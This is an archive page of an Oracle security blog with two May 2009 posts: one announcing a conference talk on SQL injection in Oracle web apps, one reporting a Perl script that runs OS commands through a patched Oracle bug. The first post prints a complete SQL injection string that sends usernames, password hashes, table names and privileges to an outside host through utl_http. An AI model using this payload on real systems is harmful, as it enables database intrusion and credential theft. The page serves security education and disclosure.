Sie befinden sich aktuell in den Archiven des Blogs Alexander Kornbrust Oracle Security Blog für Mai, 2009.
- 11g (11)
- Allgemein (29)
- David Litchfield (7)
- Exploit (21)
- Forensics (5)
- Oracle Security (95)
- passwords (8)
- Repscan (1)
- Security (21)
- Sentrigo (5)
- software (9)
- source code audit (5)
- SQL Injection (24)
- Tools (24)
- Trainings (2)
- Tutorial (2)
- 5 Aug 2010: Oracle Presentations from Blackhat 2010 Las Vegas are online
- 18 Apr 2010: Blackhat 2010 Presentation "Oracle, Interrupted: Stealing Sessions and Credentials" online
- 15 Apr 2010: New fast Oracle DES password cracker OPS_SSE2
- 14 Apr 2010: Oracle 11g R2 client trojan warning from Antivir
- 13 Apr 2010: Python Source for PLSQL Unwrapper posted
- 13 Apr 2010: Oracle CPU April 2010 is out
- 13 Apr 2010: Improve Oracle TDE with Intel AES-NI
- 12 Apr 2010: Man-in-the-Middle attacks at upcoming Black Hat Europe
- 9 Apr 2010: Oracle CPU April 2010 - Prerelease
- 8 Apr 2010: Cool Web Application Scanner: Netsparker Community Edition
Oracle Security
SQL Injection
- August 2010
- April 2010
- März 2010
- Februar 2010
- Januar 2010
- Dezember 2009
- November 2009
- Oktober 2009
- September 2009
- August 2009
- Juli 2009
- Mai 2009
- April 2009
- März 2009
- Februar 2009
- Januar 2009
- Dezember 2008
- November 2008
- Oktober 2008
- August 2008
- Juli 2008
- Mai 2008
- April 2008
- März 2008
- Februar 2008
- Januar 2008
- Dezember 2007
- November 2007
- Oktober 2007
- September 2007
- August 2007
- Juli 2007
- Juni 2007
- Mai 2007
Archive für Mai 2009
Presentation from Confidence 2009 available
16 Mai 2009 von Alexander Kornbrust.
I just uploaded the presentation “SQL Injection in Oracle Webapps” to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search creditcard numbers in the database (using dbms_xmlgen), …Here is one of the sample SQL Injection strings from the presentation. With this SQL Injection string we are getting all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.
http://victim.com/order.jsp?id=17‘ or 1=((select
sum(length(utl_http.request(’http://www.orasploit.com/’||
username||’='||password) from dba_users)))+((select
sum(utl_http.request(’http://www. orasploit.com/’||
owner||’='||table_name) from dba_tables))+((select
sum(length(utl_http.request(’http://www.orasploit.com/’||
owner||’='||table_name||’='||column_name)) from dba_users))
+((select sum(length(utl_http.request(’http://
www.orasploit.com/’||grantee||’='||granted_role) from
dba_role_privs)))+((select
sum(length(utl_http.request(’http://www.orasploit.com/’||
grantee||’='||owner||’='||table_name||’='||privilege||’='||
grantable) from dba_tab_privs)))–
Geschrieben in SQL Injection, Security, Allgemein | Drucken | 1 Kommentar »
Perl - Script to run OS commands via Oracle based Web Apps released
1 Mai 2009 von Alexander Kornbrust.
Sumit Siddarth from www.notsosecure.com has released a small perl script to run OS commands via Oracle based Web Apps. Sumit is using the bug in dbms_export_extension. This problem was fixed with CPU July 2006 but all databases without this (or higher CPU or patchset) are affected (Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2, XE) . More details are available in my updated tutorial.
I tested the script together with him against several of my test database.
The script is easy to use. Under MacOS I had to install p5-libwww-perl to run it.
At the moment the script does not work against Oracle databases without java but I am sure sooner or later this will be changed. In my opinion the most generic way to run OS commands (as user Oracle) is PL/SQL native (Oracle 9i, Oracle 10g/11g).
Geschrieben in Tools, Exploit, SQL Injection | Drucken | Keine Kommentare »